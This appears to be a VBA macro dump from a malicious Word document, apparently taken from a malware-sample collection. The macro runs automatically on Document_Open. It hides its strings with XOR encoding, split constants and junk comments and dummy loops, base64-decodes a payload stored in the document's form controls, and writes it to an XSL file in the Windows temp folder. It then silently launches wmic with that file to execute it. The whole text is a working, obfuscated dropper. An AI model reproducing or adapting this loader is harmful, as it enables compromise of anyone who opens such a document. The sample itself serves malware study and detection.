Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "a5rab"
Function a135n(aiEyT1 As String, ayI1o As Variant, aEdFxf As Byte)


Dim aObjq As Long
aObjq = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Sight magnolia blackguard
Dim aJvHOa As Long
aJvHOa = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
Dim aVQoG
aVQoG = Fix(16)
' Parochial comics tool convert eighty-four
agqXKM = UBound(ayI1o)
Dim aCacS As Long
aCacS = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Cretaceous
For anr5e = 0 To agqXKM
aiEyT1 = aiEyT1 & Chr(ayI1o(anr5e) Xor aEdFxf)
Next
Dim aLXGo4
aLXGo4 = Hex(246)
' Allah
a135n = aiEyT1
End Function
Sub as8wp(aGOKqk)
Dim aBcUG
Dim aSp34 As Long
aBcUG = 11
aSp34 = 11
auQ3P = aBcUG + aSp34
Dim aLbtTO
For aLbtTO = 16 To 51
Debug.Print Error(aLbtTO)
Next aLbtTO
' Regulated coasting
Dim artqGB
artqGB = Hex(52)
' Generator
Dim aHvpW
For aHvpW = 14 To 49
Debug.Print Error(aHvpW)
Next aHvpW

Dim aeZ1u As Long
aeZ1u = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
Dim aiUWQ
For aiUWQ = 17 To 41
Debug.Print Error(aiUWQ)
Next aiUWQ
' Jump flout martinique
End Sub
Attribute VB_Name = "aB2VF"
#If VBA7 Then
    Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
Sub main()
Dim axBm7
For axBm7 = 15 To 47
Debug.Print Error(axBm7)
Next axBm7

Dim akaoAE
akaoAE = Exp(11)
azn7DN = Not (azn7DN)
Dim aEWNI As String
Dim aOHRf
aOHRf = Hex(124)
' Specification prayers viral
aEWNI = a135n("", Array(96, 98, 127, 115, 117, 99, 99, 48, 124, 121, 99, 100, 48, 63, 118, 127, 98, 125, 113, 100, 42, 50, 115, 42, 76, 103, 121, 126, 116, 127, 103, 99, 76, 100, 117, 125, 96, 76, 113, 74, 87, 118, 69, 62, 104, 99, 124, 50), 16)
If aQBgE = False Then
aQBgE = True
Else
aQBgE = False
End If
' Celia tt
Dim aDeQ2
aDeQ2 = Exp(4)
' Gloucestershire xxx hinge
Dim aUCxyr
aUCxyr = Exp(9)
' Br gorgeous cause sparc
acerN aYKmUl(a19fKw()), "", ""
Dim a56BwG
a56BwG = Fix(13)
' Allan
Dim abqFla As Long
Dim au8Tdc As Integer
abqFla = 58
au8Tdc = 20200 / 1010
aPfUhb = abqFla + au8Tdc
' Truthfulness shyness muscle knickerbockers odoriferous
Dim ahYGv As Long
Dim aOIFue As Document
Set aOIFue = ActiveDocument
ahYGv = aOIFue.ActiveWindow.Panes(1).Pages.Count
' Pediatric
Dim ahVRtQ As Long
ahVRtQ = 6202 + 4
' Papua jos. trooper
ShellExecute 0, "", StrReverse(aGdS0 & a7C5t), aEWNI, "", 0

End Sub
Attribute VB_Name = "aDkeu"
Attribute VB_Base = "0{A9CCE23C-35A7-4FB4-A7C9-B6C6C9B9B758}{633105AC-BCA0-4136-8BDE-0F0F35CC94BC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aSjbH"
Public Const aTfbRh As String = "c:\"
Public Const aic5CJ As String = "win"
Public Const axPB65 As String = "dow"
Public Const ayobIe As String = "s\te"
Public Const aB0JL As String = "mp\"
Public Const aGdS0 As String = "ci"
Public Const a7C5t As String = "mw"
Function aYKmUl(akAdZ As String)
Dim aSF7Ye
aSF7Ye = Hex(132)
' Oriole alarm slide gon

Dim a5sgn6 As Long
a5sgn6 = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
Set aIV2l = New MSXML2.DOMDocument
Set atIoL1 = aIV2l.createElement("b64")
atIoL1.DataType = "bin.base64"
atIoL1.Text = akAdZ
aYKmUl = StrConv(atIoL1.nodeTypedValue, vbUnicode)
Dim aDnzO
For aDnzO = 22 To 56
Debug.Print Error(aDnzO)
Next aDnzO
' Sustainability afterwards adolescence
End Function
Public Sub acerN(aCBAY, aol9k8, a3VCrd)
Dim aSodTi As Long
Dim a7RT5 As Long
aSodTi = -132 + 246
a7RT5 = 56
aSPzf3 = aSodTi - a7RT5
Dim axWRQ As Long
With ActiveDocument
axWRQ = .ActiveWindow.Panes(1).Pages.Count
End With
aEr3fO = aTfbRh & aic5CJ & axPB65 & ayobIe & aB0JL
Set aRlfN = CreateObject("Scripting.FileSystemObject")
Dim azl61 As Integer
Dim aMra7 As Integer
azl61 = -34 + 130
aMra7 = 14 + 28
achYR8 = azl61 * aMra7
' Hosiery personalized
Dim aFfabi As Long
aFfabi = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Scholastic myrtle discovered unavoidable make
Dim aeC7Sm
For aeC7Sm = 25 To 38
Debug.Print Error(aeC7Sm)
Next aeC7Sm
' Jurisprudence darken portugal simile spans forego
Set aXmPE = aRlfN.CreateTextFile(aEr3fO & "\aZGfU.xsl", 1)
Dim avmKNS
avmKNS = Fix(2)
Dim a2sj4E
a2sj4E = Fix(1)
' Ye rendered reggie bullet
With aXmPE
.Write aCBAY
.Close
End With
End Sub
Function a19fKw()
If aOyL8w = False Then
aOyL8w = True
Else
aOyL8w = False
End If
' Transaction flue worcestershire brothel
Set adeOs = New aDkeu
Dim a6YTE
Dim a2cDS As Integer
a6YTE = 113
a2cDS = 47
aEhn1q = a6YTE / a2cDS
au1CY = adeOs.eatmy.Text

aabRjy = adeOs.shorts.Text

Dim azwxr
For azwxr = 18 To 35
Debug.Print Error(azwxr)
Next azwxr
' Pleiades twenty mango pistil four jt
a19fKw = au1CY & aabRjy
End Function


INQUEST-PP=macro
